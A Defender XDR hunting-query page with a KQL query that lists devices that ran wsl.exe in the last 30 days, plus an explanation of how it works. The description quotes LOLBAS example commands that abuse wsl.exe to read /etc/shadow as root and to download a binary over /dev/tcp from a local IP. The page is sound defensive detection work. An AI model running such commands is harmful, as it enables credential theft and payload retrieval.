List devices that have WSL installed
WSL Installations
Query
let WSLDevices = DeviceProcessEvents
| where Timestamp > ago(30d)
| where FileName == "wsl.exe"
| distinct DeviceId;
DeviceInfo
| where DeviceId in (WSLDevices)
| summarize arg_max(Timestamp, *) by DeviceIdAbout this query
List devices that have WSL installed
Query Information
Description
Windows Subsystem for Linux may be used by adversaries to perform actions as root, or to download files. This query lists all devices that have WSL installed and it was active in the last 30 days. This may give an indidcation about the usage in your environment. Microsoft recommends listing WSL, if there is no scenario you explicitly require them. WSL Should be installed in the folder: C:\Windows\System32\wsl.exe. From the Lolbas project some suspicious queries that can be executed by WSL are:
wsl.exe -u root -e cat /etc/shadow
wsl.exe --system calc.exe
wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
References
- https://learn.microsoft.com/en-us/windows/wsl/
- https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/
- https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
Defender XDR
Explanation
This query is designed to identify devices within a network that have the Windows Subsystem for Linux (WSL) installed and have been actively using it in the past 30 days. Here's a simple breakdown of what the query does:
-
Identify WSL Activity: It starts by looking at events related to device processes, specifically searching for instances where the process named "wsl.exe" (the executable for WSL) was run within the last 30 days.
-
List Unique Devices: It collects a list of unique device IDs where "wsl.exe" was executed during this period.
-
Get Device Information: It then retrieves detailed information about these devices from another data source, ensuring it only keeps the most recent information for each device.
In essence, this query helps network administrators identify which devices have been using WSL recently, which could be important for security monitoring, especially if WSL is not commonly used or required in their environment.
Details

Bert-Jan Pals
Released: October 20, 2024
Tables
Keywords
Operators